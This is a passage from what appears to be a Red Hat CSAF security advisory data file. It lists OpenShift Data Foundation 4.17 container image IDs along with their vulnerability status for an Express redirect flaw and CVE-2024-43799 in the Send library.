"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", 